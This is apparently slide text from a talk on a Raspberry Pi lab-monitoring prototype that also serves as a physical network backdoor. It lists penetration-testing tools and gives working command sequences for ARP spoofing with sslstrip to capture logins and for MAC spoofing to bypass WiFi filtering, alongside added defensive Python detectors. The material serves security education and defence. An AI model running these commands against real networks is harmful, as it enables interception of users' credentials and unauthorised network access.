The LabRat: Physical Backdoor Hacks and Internet of Things (IOT) Primer
Akshat Sharma, TME, Cisco Systems.
The Raspberry Pi
http://www.raspberrypi.org/downloads -- image downloads and updates
http://elinux.org/RPi_Low-level_peripherals -- working with GPIO
http://elinux.org/RPiconfig -- interfacing with screens
Google’s your best friend
Raspberry Pi as a Physical Backdoor into your network
http://securityaffairs.co/wordpress/15471/hacking/raspberry-pi-as-physical-backdoor.html
It’s a device “you can just plug in and do a full-scale penetration test from start to finish,” Porcello says. “The enterprise can use stuff like this to do testing more often and more cheaply than they’re doing it right now.”
-- CEO of Pwnie Express, Dave Porcello
- Rogue APs
- MAC spoofing on wired networks
- MITM attacks
[Figure: The LabRat Circuit. Blocks: Temperature Sensor, Humidity Sensor, Optical Fiber Tester. Labels: CH0, CH1, CH2, CH3; CLK, CS (AL), MOSI, MISO; IR LED - Receiver (two); Optical Fiber; Binary Signal In (two).]
The LabRat - a Proof of Concept Prototype
The Raspberry Pi - a $35 Linux computer that powers the LabRat prototype.
For more information on the Raspberry Pi, visit http://www.raspberrypi.org/
The LabRat Prototype: Current Setup
- 10 inch Capacitive Touchscreen
- Optical Fiber Tester
- Humidity Sensor
- Temperature Sensor
- Raspberry-Pi
- HDMI-to-LVDS converter board
- 10,000 mAh Lithium Polymer Battery
The LabRat Prototype: LM 35 + ADS7841 Temperature Sensor
- LM 35 Temperature Sensor
- ADS7841 Analog to Digital Converter
The LabRat Prototype: Humidity Sensor SMD + ADS7841
- ADS7841 Analog to Digital Converter
- Humidity Sensor SMD
The LabRat Prototype: Optical Fiber Tester
- Optical Fiber Holders
- Infra-red LED-Receiver combination to transmit messages via the fiber
Connecting to an IOT Cloud
- https://xively.com/
- Formerly Cosm, Pachube
Set up a Cosm (Now Xively) Account
• Register on Cosm (Xively) and add a device
• You will receive an API Key and FEED ID
• Now use the old Cosm eeml library to set up datastreams from the Raspberry Pi
Setting up the Python Script to send Data to Xively
Install EEML package from github
sudo apt-get install python-dev
sudo apt-get install python-pip
sudo easy_install -U distribute
sudo pip install rpi.gpio    # work with RPi GPIO pins
wget -O geekman-python-eeml.tar.gz https://github.com/geekman/python-eeml/tarball/master
tar zxvf geekman-python-eeml.tar.gz
cd geekman-python-eeml*
sudo python setup.py install
Set up Python Script
# source eeml package
import eeml
<snip>
API_KEY = 'YOUR_API_KEY'
FEED = YOUR_FEED_ID
API_URL = '/v2/feeds/{feednum}.xml'.format(feednum=FEED)
The LabRat Prototype: Online Real-Time Feed, Temperature and Humidity
Visit the Real-Time Feed at https://cosm.com/feeds/89297
The LabRat Prototype: Python Scripts
1) A Python script uploads the temperature and humidity data to an online cloud-based feed, showing how the LabRat may in the future do the same with sensor data at customer labs to provide real-time analytics.
2) The same Python script sends an email to lab admins whenever the temperature or humidity values exceed a pre-decided threshold.
3) Another Python script sends messages (binary data) through an optical fiber using an infrared LED-receiver combination and emails the data to the user. The same data may later be uploaded to an inventory management system to automatically track working equipment and its performance.
The LabRat Prototype
Current List of Penetration-Testing Tools
Information Gathering
-------------------
wireshark
tcpflow
ngrep
hostmap
kismet
btscanner
sslscan
sslstrip
sslsniff
ssldump
tcptraceroute
netmask
tcpdump
zenmap
nmap
arp-fingerprint
dnswalk
dnstracer
Vulnerability Assessment
----------------------
airodump-ng
sqlmap
nikto
svcrack
Exploitation Tools
------------------
aircrack-ng
airmon-ng
airodump-ng
aireplay-ng
sqlninja
exploit-db
Privilege Escalation
-----------------
wireshark
ettercap
tcpreplay
tcpick
packit
packeth
dsniff
Maintaining Access
----------------
ptunnel
netcat
ftp-proxy
udp-tunnel
proxychains
dns2tcp
DEMO
- ARP spoofing using sslstrip and arpspoof
- MAC spoofing using airmon-ng and macchanger
- Packet sniffing using Wireshark
- Other MITM attacks
ARP Spoofing and MAC Spoofing Attacks
ARP Spoofing
• Set up port forwarding
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
echo '1' > /proc/sys/net/ipv4/ip_forward
• Start ARP spoofing. Spoof the gateway
arpspoof -i wlan0 <gateway address>
• Start sslstrip and log user information (use the -k option to log users out of their current sessions, forcing them to log in again)
sslstrip -k -l 8080
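Added example, not part of the original slides: a defender-side check for the gateway impersonation shown above. It parses raw Ethernet/ARP frames and alerts when a pinned gateway IP is claimed by a different MAC, also reporting which other IPs that MAC has announced. The `ArpWatch` class, the addresses and the in-memory sample frames are constructed for illustration.

```python
import socket
import struct

ETH_P_ARP = 0x0806


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def parse_arp(frame):
    """Return (opcode, sender_mac, sender_ip) for an Ethernet/IPv4 ARP frame, else None."""
    if len(frame) < 42:  # 14-byte Ethernet header + 28-byte ARP body
        return None
    if struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    htype, ptype, hlen, plen, oper = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    sha, spa = struct.unpack("!6s4s", frame[22:32])
    return oper, mac_str(sha), socket.inet_ntoa(spa)


class ArpWatch:
    """Tracks IP -> MAC bindings; pinned entries (e.g. the gateway) never change."""

    def __init__(self, pinned):
        self.pinned = dict(pinned)
        self.seen = dict(pinned)

    def observe(self, frame):
        parsed = parse_arp(frame)
        if parsed is None:
            return []
        _oper, mac, ip = parsed
        alerts = []
        expected = self.pinned.get(ip, self.seen.get(ip))
        if expected is not None and expected != mac:
            # IPs this MAC announced earlier point at the host doing the spoofing.
            also = sorted(i for i, m in self.seen.items() if m == mac and i != ip)
            alerts.append({"ip": ip, "expected": expected,
                           "claimed_by": mac, "also_owns": also})
        if ip not in self.pinned:
            self.seen[ip] = mac
        return alerts


def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Constructed test input: bytes of an ARP reply frame (never sent anywhere)."""
    sha = bytes.fromhex(sender_mac.replace(":", ""))
    tha = bytes.fromhex(target_mac.replace(":", ""))
    eth = tha + sha + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, 2)
    arp += sha + socket.inet_aton(sender_ip) + tha + socket.inet_aton(target_ip)
    return eth + arp


# Constructed addresses (documentation IP range, locally administered MACs).
GATEWAY_IP, GATEWAY_MAC = "192.0.2.1", "02:00:00:00:00:01"
ROGUE_IP, ROGUE_MAC = "192.0.2.23", "02:00:00:00:00:23"
HOST_IP, HOST_MAC = "192.0.2.50", "02:00:00:00:00:50"


def run_demo():
    watch = ArpWatch({GATEWAY_IP: GATEWAY_MAC})
    frames = [
        build_arp_reply(GATEWAY_MAC, GATEWAY_IP, HOST_MAC, HOST_IP),  # genuine gateway
        build_arp_reply(ROGUE_MAC, ROGUE_IP, HOST_MAC, HOST_IP),      # device announces itself
        build_arp_reply(ROGUE_MAC, GATEWAY_IP, HOST_MAC, HOST_IP),    # gateway IP, wrong MAC
    ]
    alerts = []
    for frame in frames:
        alerts.extend(watch.observe(frame))
    return alerts


if __name__ == "__main__":
    for alert in run_demo():
        print(alert)
```

The same binding can be enforced rather than only observed with a static ARP entry for the gateway on hosts, or with dynamic ARP inspection on switches that support it.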
MAC Spoofing on WiFi (How to bypass MAC Filtering)
• ifconfig eth0 down
• airmon-ng start wlan0
• iwlist wlan0 scanning
• airodump-ng -c 6 -a --bssid <mac address of wireless access point>
--- Gives info on connected devices
• ifconfig wlan0 down
• Now use macchanger
• macchanger -m <mac of allowed devices> wlan0
• ifconfig wlan0 up
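Added example, not from the original slides: why MAC filtering is a weak control and one way to spot a cloned address from a monitoring sensor. Two radios sharing one MAC each keep their own 12-bit 802.11 sequence counter, so their interleaved management frames show repeated large jumps. The header bytes, MAC addresses and thresholds below are constructed assumptions.

```python
import struct

SEQ_MOD = 4096  # 802.11 sequence numbers are 12 bits and wrap to 0


def parse_mgmt_header(hdr):
    """Return (transmitter_mac, seq) from an 802.11 management header, else None.

    Expects the 24-byte MAC header with any radiotap prefix already stripped.
    Only management frames (type 0) are used: QoS data frames keep separate
    per-TID counters and would produce false jumps.
    """
    if len(hdr) < 24:
        return None
    if ((hdr[0] >> 2) & 0x3) != 0:
        return None
    mac = ":".join(f"{b:02x}" for b in hdr[10:16])   # Address 2 = transmitter
    (seq_ctl,) = struct.unpack("<H", hdr[22:24])     # low 4 bits = fragment number
    return mac, seq_ctl >> 4


def find_shared_macs(headers, max_gap=64, min_anomalies=3):
    """Return {mac: jump_count} for MACs whose sequence numbers jump repeatedly."""
    last, anomalies = {}, {}
    for hdr in headers:
        parsed = parse_mgmt_header(hdr)
        if parsed is None:
            continue
        mac, seq = parsed
        if mac in last:
            gap = (seq - last[mac]) % SEQ_MOD
            # gap 0 is a retransmission; a small gap is normal or a few missed frames
            if gap > max_gap:
                anomalies[mac] = anomalies.get(mac, 0) + 1
        last[mac] = seq
    return {m: n for m, n in anomalies.items() if n >= min_anomalies}


def sample_header(mac, seq, fc0=0x40):
    """Constructed test input: header bytes for a frame from `mac` (0x40 = probe request)."""
    addr = bytes.fromhex(mac.replace(":", ""))
    bcast = b"\xff" * 6
    return (bytes([fc0, 0]) + b"\x00\x00" + bcast + addr + bcast
            + struct.pack("<H", (seq % SEQ_MOD) << 4))


ALLOWED = "02:00:00:00:00:aa"   # constructed: MAC on the filter list, used by two radios
LONE = "02:00:00:00:00:bb"      # constructed: MAC used by a single radio


def run_demo():
    shared_seqs = [100, 3000, 101, 3001, 102, 3002]   # two counters interleaved
    lone_seqs = [4094, 4095, 0, 1, 1, 3]              # wraparound plus one retransmission
    capture = []
    for a, b in zip(shared_seqs, lone_seqs):
        capture.append(sample_header(ALLOWED, a))
        capture.append(sample_header(LONE, b))
    capture.append(sample_header(LONE, 2000, fc0=0x08))  # data frame, ignored
    return find_shared_macs(capture)


if __name__ == "__main__":
    print(run_demo())
```

This only fires while the legitimate device and the clone are both transmitting; authenticating clients with 802.1X or WPA2-Enterprise removes the reliance on the MAC address altogether.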
Putting The Internet of Things into Perspective
Co-incidental Cisco Plugin :p
Thank You
